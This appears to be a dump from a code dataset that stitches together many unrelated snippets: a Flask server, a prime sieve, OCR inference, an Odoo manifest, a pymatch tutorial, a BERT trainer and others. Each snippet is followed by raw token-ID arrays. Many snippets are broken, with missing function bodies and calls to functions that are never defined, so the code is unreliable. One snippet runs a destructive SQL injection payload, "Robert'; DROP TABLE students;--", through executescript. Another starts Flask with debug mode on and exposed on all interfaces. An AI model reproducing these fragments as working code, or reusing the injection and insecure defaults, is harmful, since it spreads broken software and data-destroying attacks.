600,
7,
15,
11,
362,
8,
198,
4798,
7,
7061,
... | 1.910867 | 819 |
#!/usr/bin/env python2.7
from flask import Flask, url_for, make_response, render_template, request
from flask import json, jsonify, current_app, Blueprint
from flask.ext.sqlalchemy import SQLAlchemy
from sqlalchemy.sql import func
from json import dumps
from sqlalchemy.orm import class_mapper
from sqlalchemy import or_, and_, ForeignKey
from sqlalchemy import func
from flask.ext.compress import Compress
from flask.ext.assets import Environment, Bundle
from subprocess import Popen,PIPE
import argparse
import os.path
import collections
admin = Blueprint('admin', __name__, static_folder='static', url_prefix='/')
db = SQLAlchemy()
@admin.route('/')
@admin.route('getbubbleplot')
@admin.route('getbarplot')
@admin.route('getplot/<plot_type>')
@admin.route('getbubbleinfo')
@admin.route('getdiffinfo')
@admin.route('getbubblealignments/<x>/<y>')
@admin.route('getdiffalignments/<diff>')
@admin.route('set_comparison/<comp>')
if __name__== '__main__':
parser = argparse.ArgumentParser(description='Web server to compare STR calls and their associated alignments')
parser.add_argument("--bams", type=str, required=True, help='Comma-separated list of bam files')
parser.add_argument("--bais", type=str, required=True, help='Comma-separated list of bam index files. Order must match that of the --bams arguments')
parser.add_argument("--fasta", type=str, required=True, help='Directory containing chromosome fasta files')
parser.add_argument("--vizalign", type=str, required=True, help='Full path for vizalign executable')
args = parser.parse_args()
# Create app
my_app = create_app(args.bams, args.bais, args.fasta, args.vizalign)
# Run it
my_app.run(host='0.0.0.0', port=6015, debug=True)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
17,
13,
22,
198,
198,
6738,
42903,
1330,
46947,
11,
19016,
62,
1640,
11,
787,
62,
26209,
11,
8543,
62,
28243,
11,
2581,
198,
6738,
42903,
1330,
33918,
11,
33918,
1958,
11,
1459,
62,
1324,... | 2.936877 | 602 |
#program to check whether a file exists.
import os.path
print(main('C:/Users/pc/Desktop/Python Task Solutions/Uche Clare/Phase 1/Python Basic 1/Day-5/Task 31', 'py' ))
| [
2,
23065,
284,
2198,
1771,
257,
2393,
7160,
13,
198,
11748,
28686,
13,
6978,
198,
4798,
7,
12417,
10786,
34,
14079,
14490,
14,
14751,
14,
36881,
14,
37906,
15941,
23555,
14,
52,
2395,
22736,
14,
35645,
352,
14,
37906,
14392,
352,
14,
... | 2.965517 | 58 |
def series(n, bool=False):
"""
:param bool: If bool=True, then the function will return the boolean list of the prime numbers.
If bool=False, then the function will return the list of prime number less than n+1.
:param n: Prime Number less than n.
:return: returns None if n is 0 or 1 otherwise returns the list of prime numbers less than n.
"""
# If n is less than 2, return None because no prime number is less than 2.
if n<2:
return None
prime = [True]*(n+1)
p = 2
while (p * p <= n):
# If prime[p] is not changed, then it is a prime
if (prime[p] == True):
# Update all multiples of p
for i in range(p * 2, n+1, p):
prime[i] = False
p += 1
if bool:
return prime
else:
list_ = []
for i in range(2, n+1):
if prime[i]:
list_.append(i)
return list_
if __name__ == '__main__':
main() | [
198,
4299,
2168,
7,
77,
11,
20512,
28,
25101,
2599,
220,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
1058,
17143,
20512,
25,
1002,
20512,
28,
17821,
11,
788,
262,
2163,
481,
1441,
262,
25131,
1351,
286,
262,
6994,
3146,
13,
198,
... | 2.156448 | 473 |
from Test import Test, Test as test
'''
Build Tower
Build Tower by the following given argument:
number of floors (integer and always greater than 0).
Tower block is represented as *
for example, a tower of 3 floors looks like below
[
' * ',
' *** ',
'*****'
]
and a tower of 6 floors looks like below
[
' * ',
' *** ',
' ***** ',
' ******* ',
' ********* ',
'***********'
]
'''
# Initial
# Condensed
test.describe("Tests")
test.it("Basic Tests")
test.assert_equals(tower_builder(1), ['*', ])
test.assert_equals(tower_builder(2), [' * ', '***'])
test.assert_equals(tower_builder(3), [' * ', ' *** ', '*****'])
| [
6738,
6208,
1330,
6208,
11,
6208,
355,
1332,
198,
198,
7061,
6,
198,
15580,
8765,
198,
15580,
8765,
416,
262,
1708,
1813,
4578,
25,
198,
17618,
286,
18570,
357,
41433,
290,
1464,
3744,
621,
657,
737,
198,
198,
51,
789,
2512,
318,
79... | 2.680162 | 247 |
import logging
import os
import editdistance
import matplotlib.pyplot as plt
from DataLoaderIAM import Batch
from Model import Model
from SamplePreprocessor import word_image_preprocess, image_preprocess
from spelling_correction import SpellingCorrector
from translator import Translator, google_translate
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' # FATAL
logging.getLogger('tensorflow').setLevel(logging.FATAL)
def infer_line(model, images_lst):
"""recognize text in image provided by file path"""
recognized_words = []
for img in images_lst:
img = word_image_preprocess(img, Model.lineImgSize)
batch = Batch(None, [img])
(recognized, _) = model.inferBatch(batch)
recognized_words.append(recognized[0])
recognized_line = ' '.join(w for w in recognized_words)
return SpellingCorrector().get_correct(recognized_line)
def infer_batch(model, batch):
"""recognize text in image provided by file path"""
recognized_lines = [infer_line(model, lst) for lst in batch.imgs]
return recognized_lines
def validate_lines(model, loader):
"""validate NN"""
print('Validate NN')
loader.validationSet()
numCharErr = 0
numCharTotal = 0
numLinesOK = 0
numLinesTotal = 0
while loader.hasNext():
iterInfo = loader.getIteratorInfo()
print(f'Batch: {iterInfo[0]} / {iterInfo[1]}')
batch = loader.getNext()
recognized = infer_batch(model, batch)
print('Ground truth -> Recognized')
for i in range(len(recognized)):
numLinesOK += 1 if batch.gtTexts[i] == recognized[i] else 0
numLinesTotal += 1
dist = editdistance.eval(recognized[i], batch.gtTexts[i])
numCharErr += dist
numCharTotal += len(batch.gtTexts[i])
print('[OK]' if dist == 0 else '[ERR:%d]' % dist, '"' + batch.gtTexts[i] + '"', '->',
'"' + recognized[i] + '"')
# print validation result
charErrorRate = numCharErr / numCharTotal
wordAccuracy = numLinesOK / numLinesTotal
print(f'Character error rate: {charErrorRate * 100.0}%. Word accuracy: {wordAccuracy * 100.0}%.')
return charErrorRate, wordAccuracy
def main():
"""main function"""
model = Model(mustRestore=True, is_line=True)
res = image_preprocess('../data/lines/3.png', is_lines=True)
for (j, w) in enumerate(res):
plt.imshow(w, cmap='gray')
plt.show()
pred_line = infer_line(model, res)
translator = Translator()
print(f'\n\n\nPredicted line: \t {pred_line}')
print('Our translator: \t', translator.translate(pred_line))
print('Google translator: \t', google_translate(pred_line))
if __name__ == '__main__':
main()
| [
11748,
18931,
198,
11748,
28686,
198,
198,
11748,
4370,
30246,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
198,
6738,
6060,
17401,
40,
2390,
1330,
347,
963,
198,
6738,
9104,
1330,
9104,
198,
6738,
27565,
6719,
413... | 2.522581 | 1,085 |
# See LICENSE file for full copyright and licensing details.
{
'name': 'HOSTEL',
'version': "12.0.1.0.0",
'author': 'Serpent Consulting Services Pvt. Ltd.',
'category': 'School Management',
'website': 'http://www.serpentcs.com',
'license': "AGPL-3",
'complexity': 'easy',
'summary': 'Module For HOSTEL Management In School',
'depends': ['school', 'account'],
'images': ['static/description/SchoolHostel.png'],
'data': ['security/hostel_security.xml',
'security/ir.model.access.csv',
'views/hostel_view.xml',
'views/hostel_sequence.xml',
'views/report_view.xml',
'views/hostel_fee_receipt.xml',
'data/hostel_schedular.xml',
'wizard/terminate_reason_view.xml'],
'demo': ['demo/school_hostel_demo.xml'],
'installable': True,
'auto_install': False
}
| [
2,
4091,
38559,
24290,
2393,
329,
1336,
6634,
290,
15665,
3307,
13,
198,
198,
90,
198,
220,
220,
220,
705,
3672,
10354,
705,
39,
10892,
3698,
3256,
198,
220,
220,
220,
705,
9641,
10354,
366,
1065,
13,
15,
13,
16,
13,
15,
13,
15,
... | 2.223881 | 402 |
# Copyright 2006 James Tauber and contributors
# Copyright (C) 2009 Luke Kenneth Casson Leighton <lkcl@lkcl.net>
# Copyright (C) 2012 Robert Peters <robertpeters@winterlionsoftware.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pyjamas import DOM
from pyjamas import Factory
from __pyjamas__ import console
from sets import Set
import pygwt
from pyjamas.ui.Widget import Widget
from pyjamas.ui import Event
from pyjamas.ui import Focus
from pyjamas.ui.TreeItem import RootTreeItem, TreeItem
from pyjamas.ui import MouseListener
from pyjamas.ui import KeyboardListener
from pyjamas.ui import FocusListener
Factory.registerClass('pyjamas.ui.Tree', 'Tree', Tree)
| [
2,
15069,
4793,
3700,
36849,
527,
290,
20420,
198,
2,
15069,
357,
34,
8,
3717,
11336,
23632,
14154,
261,
1004,
42993,
1279,
75,
74,
565,
31,
75,
74,
565,
13,
3262,
29,
198,
2,
15069,
357,
34,
8,
2321,
5199,
15722,
1279,
305,
4835,... | 3.56231 | 329 |
from typing import Any, Dict
from boto3 import Session
from app import Remediation
from app.remediation_base import RemediationBase
@Remediation
class AwsRdsEnableAutoMinorVersionUpgrade(RemediationBase):
"""Remediation that enables Auto Minor Version upgrade for RDS instances"""
@classmethod
@classmethod
@classmethod
| [
6738,
19720,
1330,
4377,
11,
360,
713,
198,
198,
6738,
275,
2069,
18,
1330,
23575,
198,
198,
6738,
598,
1330,
3982,
276,
3920,
198,
6738,
598,
13,
260,
2379,
341,
62,
8692,
1330,
3982,
276,
3920,
14881,
628,
198,
31,
8413,
276,
3920... | 3.39604 | 101 |
"""Constants. Most are physical, except for alphabet"""
import numpy as np
G = 6.674e-11 # N*m^2/kg^2
h = 6.6261e-34 # J*s
epsilon_0 = 8.854e-12 # F/m
mu_0 = 1.257e-6 # H/m
c = 2.99792e8 # m/s
sigma = 5.6704e-8 # W/m^2/K^4
hbar = 1.05457e-34 # J*s
k = 8.98755e9 # Nm^2/C^2
tau = 2 * np.pi
kb = 1.380648e-23
alphabet = ("ABCDEFHGIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 `~!"
"@#$%^&*()-_+={}[]|\\:'\"<,>.?/")
m_earth = 5.9722e24
m_sun = 1.989e30
| [
37811,
34184,
1187,
13,
4042,
389,
3518,
11,
2845,
329,
24830,
37811,
198,
198,
11748,
299,
32152,
355,
45941,
198,
198,
38,
796,
718,
13,
45385,
68,
12,
1157,
220,
1303,
399,
9,
76,
61,
17,
14,
10025,
61,
17,
198,
71,
796,
718,
... | 1.717857 | 280 |
from robot import robot
from robotAI import robotAI
from simulator import *
from harry_plotter import harry_plotter
if __name__ == "__main__":
main()
| [
6738,
9379,
1330,
9379,
198,
6738,
9379,
20185,
1330,
9379,
20185,
198,
6738,
35375,
1330,
1635,
198,
6738,
3971,
563,
62,
29487,
353,
1330,
3971,
563,
62,
29487,
353,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
... | 3.229167 | 48 |
# -*- coding: utf-8 -*-
# import from apps here
# import from lib
# ===============================================================================
from django.contrib import admin
from homework.models import TaskLog, TaskResult, CapacityData2
admin.site.register(CapacityData2)
# admin.site.register(TaskResult)
# admin.site.register(TaskLog)
# ===============================================================================
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
2,
1330,
422,
6725,
994,
628,
198,
2,
1330,
422,
9195,
198,
2,
38093,
25609,
855,
198,
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
198,
6738,
26131,
13,
27530... | 4.489583 | 96 |
rbac = """
---
apiVersion: agilicus.com/v1
kind: RbacRole
metadata:
name: {cfg[name]}-{cfg[downstream_base_host]}-whitelist
spec:
name: '*'
rules:
- host: {cfg[downstream_base_host]}.__ROOT_DOMAIN__
path: "^/.*"
method: "*"
"""
| [
26145,
330,
796,
37227,
198,
6329,
198,
15042,
14815,
25,
556,
346,
24552,
13,
785,
14,
85,
16,
198,
11031,
25,
371,
65,
330,
47445,
198,
38993,
25,
198,
220,
1438,
25,
1391,
37581,
58,
3672,
48999,
12,
90,
37581,
58,
2902,
5532,
... | 2.118644 | 118 |
import FWCore.ParameterSet.Config as cms
import math
from DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer
OuterTrackerMonitorTTCluster = DQMEDAnalyzer('OuterTrackerMonitorTTCluster',
TopFolderName = cms.string('SiOuterTracker'),
TTClusters = cms.InputTag("TTClustersFromPhase2TrackerDigis", "ClusterInclusive"),
# Number of clusters per layer
TH1TTCluster_Barrel = cms.PSet(
Nbinsx = cms.int32(7),
xmax = cms.double(7.5),
xmin = cms.double(0.5)
),
# Number of clusters per disc
TH1TTCluster_ECDiscs = cms.PSet(
Nbinsx = cms.int32(6),
xmax = cms.double(6.5),
xmin = cms.double(0.5)
),
# Number of clusters per EC ring
TH1TTCluster_ECRings = cms.PSet(
Nbinsx = cms.int32(16),
xmin = cms.double(0.5),
xmax = cms.double(16.5)
),
# Cluster eta distribution
TH1TTCluster_Eta = cms.PSet(
Nbinsx = cms.int32(45),
xmax = cms.double(5.0),
xmin = cms.double(-5.0)
),
# Cluster phi distribution
TH1TTCluster_Phi = cms.PSet(
Nbinsx = cms.int32(60),
xmax = cms.double(math.pi),
xmin = cms.double(-math.pi)
),
# Cluster R distribution
TH1TTCluster_R = cms.PSet(
Nbinsx = cms.int32(45),
xmax = cms.double(120),
xmin = cms.double(0)
),
# Cluster Width vs. I/O sensor
TH2TTCluster_Width = cms.PSet(
Nbinsx = cms.int32(7),
xmax = cms.double(6.5),
xmin = cms.double(-0.5),
Nbinsy = cms.int32(2),
ymax = cms.double(1.5),
ymin = cms.double(-0.5)
),
# TTCluster forward/backward endcap y vs x
TH2TTCluster_Position = cms.PSet(
Nbinsx = cms.int32(960),
xmax = cms.double(120),
xmin = cms.double(-120),
Nbinsy = cms.int32(960),
ymax = cms.double(120),
ymin = cms.double(-120)
),
#TTCluster #rho vs z
TH2TTCluster_RZ = cms.PSet(
Nbinsx = cms.int32(900),
xmax = cms.double(300),
xmin = cms.double(-300),
Nbinsy = cms.int32(900),
ymax = cms.double(120),
ymin = cms.double(0)
),
)
| [
11748,
48849,
14055,
13,
36301,
7248,
13,
16934,
355,
269,
907,
198,
11748,
10688,
198,
198,
6738,
360,
48,
5653,
712,
1063,
13,
14055,
13,
35,
48,
30733,
37702,
9107,
1330,
360,
48,
30733,
37702,
9107,
198,
7975,
263,
35694,
35479,
1... | 1.877375 | 1,158 |
"""The osramlightify component."""
| [
37811,
464,
28686,
859,
2971,
1958,
7515,
526,
15931,
198
] | 3.5 | 10 |
import logging
import logging.config
import os
import socket
from trollius import SSLContext
import app as app
from worker import ansible_queue
# from workers.ansible_worker.ansible_server import AnsibleServer
from ansible_server import AnsibleServer
from util.log import logfile_path
from raven.handlers.logging import SentryHandler
from raven.conf import setup_logging
logger = logging.getLogger(__name__)
DEFAULT_WEBSOCKET_PORT = 8788
DEFAULT_CONTROLLER_PORT = 8688
if __name__ == "__main__":
logging_config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"standard": {"format": "%(asctime)s [%(levelname)s] %(name)s: %(message)s"},
},
"handlers": {
"default": {
"level": "DEBUG", #'INFO',
"formatter": "standard",
"class": "logging.StreamHandler",
},
},
"loggers": {
"": {"handlers": ["default"], "level": "DEBUG", "propagate": True} #'INFO',
},
}
logging.config.dictConfig(logging_config)
run_ansible_manager()
| [
11748,
18931,
198,
11748,
18931,
13,
11250,
198,
11748,
28686,
198,
11748,
17802,
198,
198,
6738,
13278,
3754,
1330,
25952,
21947,
198,
11748,
598,
355,
598,
198,
6738,
8383,
1330,
9093,
856,
62,
36560,
198,
198,
2,
422,
3259,
13,
504,
... | 2.341667 | 480 |
# # Example
#
# The following example demonstrates how to the use the `pymatch` package to match [Lending Club Loan Data](https://www.kaggle.com/wendykan/lending-club-loan-data). Follow the link to download the dataset from Kaggle (you'll have to create an account, it's fast and free!).
#
# Here we match Lending Club users that fully paid off loans (control) to those that defaulted (test). The example is contrived, however a use case for this could be that we want to analyze user sentiment with the platform. Users that default on loans may have worse sentiment because they are predisposed to a bad situation--influencing their perception of the product. Before analyzing sentiment, we can match users that paid their loans in full to users that defaulted based on the characteristics we can observe. If matching is successful, we could then make a statetment about the **causal effect** defaulting has on sentiment if we are confident our samples are sufficiently balanced and our model is free from omitted variable bias.
#
# This example, however, only goes through the matching procedure, which can be broken down into the following steps:
#
# * [Data Preparation](#Data-Prep)
# * [Fit Propensity Score Models](#Matcher)
# * [Predict Propensity Scores](#Predict-Scores)
# * [Tune Threshold](#Tune-Threshold)
# * [Match Data](#Match-Data)
# * [Assess Matches](#Assess-Matches)
#
# ----
# ### Data Prep
import warnings
warnings.filterwarnings("ignore")
from pymatch import Matcher
import pandas as pd
import numpy as np
# Load the dataset (`loan.csv`) and select a subset of columns.
#
# Create test and control groups and reassign `loan_status` to be a binary treatment indicator. This is our reponse in the logistic regression model(s) used to generate propensity scores.
data = pd.read_csv("./example_files/loan_sample.csv")
print(data.head())
test = data[data['loan_status'] == 1]
control = data[data['loan_status'] == 0]
# ----
#
# ### `Matcher`
# Initalize the `Matcher` object.
#
# **Note that:**
#
# * Upon intialization, `Matcher` prints the formula used to fit logistic regression model(s) and the number of records in the majority/minority class.
# * The regression model(s) are used to generate propensity scores. In this case, we are using the covariates on the right side of the equation to estimate the probability of defaulting on a loan (`loan_status`= 1).
# * `Matcher` will use all covariates in the dataset unless a formula is specified by the user. Note that this step is only fitting model(s), we assign propensity scores later.
# * Any covariates passed to the (optional) `exclude` parameter will be ignored from the model fitting process. This parameter is particularly useful for unique identifiers like a `user_id`.
m = Matcher(test, control, yvar="loan_status", exclude=[])
# There is a significant imbalance in our data--the majority group (fully-paid loans) having many more records than the minority group (defaulted loans). We account for this by setting `balance=True` when calling `Matcher.fit_scores()` below. This tells `Matcher` to sample from the majority group when fitting the logistic regression model(s) so that the groups are of equal size. When undersampling this way, it is highly recommended that `nmodels` is explictly assigned to a integer much larger than 1. This ensure is that more of the majority group is contributing to the generation of propensity scores. The value of this integer should depend on the severity of the imbalance; here we use `nmodels`=100.
# for reproducibility
np.random.seed(20170925)
m.fit_scores(balance=True, nmodels=10)
# The average accuracy of our 100 models is 70.21%, suggesting that there's separability within our data and justifiying the need for the matching procedure. It's worth noting that we don't pay much attention to these logistic models since we are using them as a feature extraction tool (generation of propensity scores). The accuracy is a good way to detect separability at a glance, but we shouldn't spend time tuning and tinkering with these models. If our accuracy was close to 50%, that would suggest we cannot detect much separability in our groups given the features we observe and that matching is probably not necessary (or more features should be included if possible).
# ### Predict Scores
m.predict_scores()
m.plot_scores()
exit()
# The plot above demonstrates the separability present in our data. Test profiles have a much higher **propensity**, or estimated probability of defaulting given the features we isolated in the data.
# ---
#
# ### Tune Threshold
# The `Matcher.match()` method matches profiles that have propensity scores within some threshold.
#
# i.e. for two scores `s1` and `s2`, `|s1 - s2|` <= `threshold`
#
# By default matches are found *from* the majority group *for* the minority group. For example, if our test group contains 1,000 records and our control group contains 20,000, `Matcher` will
# iterate through the test (minority) group and find suitable matches from the control (majority) group. If a record in the minority group has no suitable matches, it is dropped from the final matched dataset. We need to ensure our threshold is small enough such that we get close matches and retain most (or all) of our data in the minority group.
#
# Below we tune the threshold using `method="random"`. This matches a random profile that is within the threshold
# as there could be many. This is much faster than the alternative method "min", which finds the *closest* match for every minority record.
m.tune_threshold(method="random")
# It looks like a threshold of 0.0001 retains 100% of our data. Let's proceed with matching using this threshold.
# ---
#
# ### Match Data
# Below we match one record from the majority group to each record in the minority group. This is done **with** replacement, meaning a single majority record can be matched to multiple minority records. `Matcher` assigns a unique `record_id` to each record in the test and control groups so this can be addressed after matching. If susequent modelling is planned, one might consider weighting models using a weight vector of 1/`f` for each record, `f` being a record's frequency in the matched dataset. Thankfully `Matcher` can handle all of this for you :).
m.match(method="min", nmatches=1, threshold=0.0001)
m.record_frequency()
# It looks like the bulk of our matched-majority-group records occur only once, 68 occur twice, ... etc. We can preemptively generate a weight vector using `Matcher.assign_weight_vector()`
m.assign_weight_vector()
# Let's take a look at our matched data thus far. Note that in addition to the weight vector, `Matcher` has also assigned a `match_id` to each record indicating our (in this cased) *paired* matches since we use `nmatches=1`. We can verify that matched records have `scores` within 0.0001 of each other.
m.matched_data.sort_values("match_id").head(6)
# ---
#
# ### Assess Matches
# We must now determine if our data is "balanced". Can we detect any statistical differences between the covariates of our matched test and control groups? `Matcher` is configured to treat categorical and continouous variables separately in this assessment.
# ___Discrete___
#
# For categorical variables, we look at plots comparing the proportional differences between test and control before and after matching.
#
# For example, the first plot shows:
# * `prop_test` - `prop_control` for all possible `term` values---`prop_test` and `prop_control` being the proportion of test and control records with a given term value, respectively. We want these (orange) bars to be small after matching.
# * Results (pvalue) of a Chi-Square Test for Independence before and after matching. After matching we want this pvalue to be > 0.05, resulting in our failure to reject the null hypothesis that the frequecy of the enumerated term values are independent of our test and control groups.
categorical_results = m.compare_categorical(return_table=True)
categorical_results
# Looking at the plots and test results, we did a pretty good job balancing our categorical features! The p-values from the Chi-Square tests are all > 0.05 and we can verify by observing the small proportional differences in the plots.
#
# ___Continuous___
#
# For continous variables we look at Empirical Cumulative Distribution Functions (ECDF) for our test and control groups before and after matching.
#
# For example, the first plot pair shows:
# * ECDF for test vs ECDF for control before matching (left), ECDF for test vs ECDF for control after matching(right). We want the two lines to be very close to each other (or indistiguishable) after matching.
# * Some tests + metrics are included in the chart titles.
# * Tests performed:
# * Kolmogorov-Smirnov Goodness of fit Test (KS-test)
# This test statistic is calculated on 1000
# permuted samples of the data, generating
# an imperical p-value. See pymatch.functions.ks_boot()
# This is an adaptation of the ks.boot() method in
# the R "Matching" package
# https://www.rdocumentation.org/packages/Matching/versions/4.9-2/topics/ks.boot
# * Chi-Square Distance:
# Similarly this distance metric is calculated on
# 1000 permuted samples.
# See pymatch.functions.grouped_permutation_test()
#
# * Other included Stats:
# * Standarized mean and median differences.
# How many standard deviations away are the mean/median
# between our groups before and after matching
# i.e. `abs(mean(control) - mean(test))` / `std(control.union(test))`
cc = m.compare_continuous(return_table=True)
cc
# We want the pvalues from both the KS-test and the grouped permutation of the Chi-Square distance after matching to be > 0.05, and they all are! We can verify by looking at how close the ECDFs are between test and control.
#
# # Conclusion
# We saw a very "clean" result from the above procedure, achieving balance among all the covariates. In my work at Mozilla, we see much hairier results using the same procedure, which will likely be your experience too. In the case that certain covariates are not well balanced, one might consider tinkering with the parameters of the matching process (`nmatches`>1) or adding more covariates to the formula specified when we initialized the `Matcher` object.
# In any case, in subsequent modelling, you can always control for variables that you haven't deemed "balanced".
| [
198,
2,
1303,
17934,
198,
2,
198,
2,
383,
1708,
1672,
15687,
703,
284,
262,
779,
262,
4600,
79,
4948,
963,
63,
5301,
284,
2872,
685,
43,
1571,
6289,
32314,
6060,
16151,
5450,
1378,
2503,
13,
74,
9460,
293,
13,
785,
14,
86,
437,
... | 3.716188 | 2,854 |
from django.core.urlresolvers import reverse
from django.test import Client, TestCase
# Route Helpers
# Core Views | [
6738,
42625,
14208,
13,
7295,
13,
6371,
411,
349,
690,
1330,
9575,
198,
6738,
42625,
14208,
13,
9288,
1330,
20985,
11,
6208,
20448,
628,
220,
220,
220,
1303,
18956,
10478,
364,
628,
220,
220,
220,
1303,
7231,
29978
] | 3.263158 | 38 |
import contextlib
import sublime
from live.settings import setting
from live.shared.backend import interacts_with_backend
from live.shared.cursor import Cursor
from live.sublime.edit import edit_for
from live.sublime.edit import edits_self_view
from live.sublime.misc import add_hidden_regions
from live.sublime.misc import read_only_set_to
from live.sublime.region_edit import RegionEditHelper
from live.sublime.selection import set_selection
from live.ws_handler import ws_handler
class UserInputOutputInfo:
"""Helper class that knows where are prompt regions and result regions in a REPL"""
@property
| [
11748,
4732,
8019,
198,
11748,
41674,
198,
198,
6738,
2107,
13,
33692,
1330,
4634,
198,
6738,
2107,
13,
28710,
13,
1891,
437,
1330,
44020,
62,
4480,
62,
1891,
437,
198,
6738,
2107,
13,
28710,
13,
66,
21471,
1330,
327,
21471,
198,
6738... | 3.608187 | 171 |
from torch import nn
from sklearn.metrics import accuracy_score
import pandas as pd
from torch.utils.data import DataLoader, Dataset
from tqdm import tqdm
from utils import fix_seed
import torch
from transformers import BertTokenizer
from torch import softmax
path = 'E:\\ptm\\roberta'
device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')
tokenizer = BertTokenizer.from_pretrained(path)
# 准备我们需要用到的参数和layer
# 前向传播,那我们准备好的layer拼接在一起
# 训练模型
if __name__ == '__main__':
train()
| [
6738,
28034,
1330,
299,
77,
198,
6738,
1341,
35720,
13,
4164,
10466,
1330,
9922,
62,
26675,
198,
11748,
19798,
292,
355,
279,
67,
198,
6738,
28034,
13,
26791,
13,
7890,
1330,
6060,
17401,
11,
16092,
292,
316,
198,
6738,
256,
80,
36020... | 2.191667 | 240 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ## ###############################################################
# selectionsort.py
#
# Author: Mauricio Matamoros
# License: MIT
#
# ## ###############################################################
from comparesort.array import Array
def selectionsort(array):
"""Sorts the provided Array object using the Selection Sort algorithm"""
if isinstance(array, list):
array = Array(array) # Converts the list to an Array
if not isinstance(array, Array):
raise TypeError("Expected a list or Array object")
# Selection Sort Algorithm
for i in range(len(array)):
# Find smallest unsorted element in Array:
ix_min = i
for j in range(i+1, len(array)):
if array[ix_min] > array[j]:
ix_min = j
# Swap the smallest element found with the firs element of the
# unsorted sub-array
array.swap(i, ix_min)
#end for
#end def
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
22492,
1303,
29113,
14468,
7804,
4242,
2235,
198,
2,
28224,
419,
13,
9078,
198,
2,
198,
2,
6434,
25,
18867,
... | 3.156028 | 282 |
#!/usr/bin/python3
import sqlite3
db = "./students.db"
conn = sqlite3.connect(db)
c = conn.cursor()
print("Without Hack: \n")
c.execute("SELECT * from students WHERE Name='Robert'")
result = c.fetchall()
print(result)
print("With Hack: \n")
Name = "Robert'; DROP TABLE students;--"
print("SELECT * from students WHERE Name='%s'" % Name)
c.executescript("SELECT * from students WHERE Name='%s'" % Name)
result = c.fetchall()
print(result)
conn.close() | [
2,
48443,
14629,
14,
8800,
14,
29412,
18,
198,
11748,
44161,
578,
18,
198,
198,
9945,
796,
366,
19571,
19149,
658,
13,
9945,
1,
198,
37043,
796,
44161,
578,
18,
13,
8443,
7,
9945,
8,
198,
66,
796,
48260,
13,
66,
21471,
3419,
198,
... | 2.797546 | 163 |
from typing import Counter, List
from Game.server_functions import Parser, RoundManager
import random
from fastapi import FastAPI, WebSocket, WebSocketDisconnect
from fastapi.responses import HTMLResponse
from fastapi.staticfiles import StaticFiles
import asyncio
import re
app = FastAPI()
input_parser = Parser()
round_manager = RoundManager(1)
# app.mount("/static", StaticFiles(directory="static"), name="static")
cache = []
current_check = None
statement_order = []
manager = ConnectionManager()
scores = {}
random_statement = []
@app.get("/test")
@app.websocket("/ws/{client_id}")
import uvicorn
if __name__ == '__main__':
uvicorn.run('main:app', host="127.0.0.1", port = 8001, log_level = "info")
| [
6738,
19720,
1330,
15034,
11,
7343,
198,
6738,
3776,
13,
15388,
62,
12543,
2733,
1330,
23042,
263,
11,
10485,
13511,
198,
11748,
4738,
198,
198,
6738,
3049,
15042,
1330,
12549,
17614,
11,
5313,
39105,
11,
5313,
39105,
7279,
8443,
198,
6... | 3.139738 | 229 |
from __future__ import annotations
__all__ = ["run", "main"]
import os
import sys
import io
import argparse
from typing import Optional
from gada import component, runners, datadir
def split_unknown_args(argv: list[str]) -> tuple[list[str], list[str]]:
"""Separate known command-line arguments from unknown one.
Unknown arguments are separated from known arguments by
the special **--** argument.
:param argv: command-line arguments
:return: tuple (known_args, unknown_args)
"""
for i in range(len(argv)):
if argv[i] == "--":
return argv[:i], argv[i + 1 :]
return argv, []
def run(
node: str,
argv: Optional[list[str]] = None,
*,
stdin=None,
stdout=None,
stderr=None,
):
"""Run a gada node:
.. code-block:: python
>>> import gada
>>>
>>> # Overwrite "gada/test/testnodes/config.yml" for this test
>>> gada.test_utils.write_testnodes_config({
... 'nodes': {
... 'echo': {
... 'runner': 'generic',
... 'bin': 'echo'
... }
... }
... })
>>>
>>> # Need to create fake stdin and stdout for unittests
>>> with gada.test_utils.PipeStream() as stdin:
... with gada.test_utils.PipeStream() as stdout:
... # Run node with CLI arguments
... gada.run(
... 'testnodes.echo',
... ['hello'],
... stdin=stdin.reader,
... stdout=stdout.writer,
... stderr=stdout.writer
... )
...
... # Close writer end so we can read form it
... stdout.writer.close()
...
... # Read node output
... stdout.reader.read().decode().strip()
'hello'
>>>
The three parameters ``stdin``, ``stdout`` or ``stderr`` are provided as a convenience
for writing unit tests when you can't use ``sys.stdin`` or ``sys.stdout``, or simply
when you want to be able to read from the output.
:param node: node to run
:param argv: additional CLI arguments
:param stdin: input stream
:param stdout: output stream
:param stderr: error stream
"""
# Load gada configuration
gada_config = datadir.load_config()
# Check command format
node_argv = node.split(".")
if len(node_argv) != 2:
raise Exception(f"invalid command {node}")
# Load component module
comp = component.load(node_argv[0])
# Load node configuration
node_config = component.get_node_config(component.load_config(comp), node_argv[1])
# Load correct runner
runner = runners.load(node_config.get("runner", None))
# Run component
runner.run(
comp=comp,
gada_config=gada_config,
node_config=node_config,
argv=argv,
stdin=stdin,
stdout=stdout,
stderr=stderr,
)
def main(
argv: Optional[list[str]] = None,
*,
stdin=None,
stdout=None,
stderr=None,
):
"""Gada main:
.. code-block:: python
>>> import gada
>>>
>>> # Overwrite "gada/test/testnodes/config.yml" for this test
>>> gada.test_utils.write_testnodes_config({
... 'nodes': {
... 'echo': {
... 'runner': 'generic',
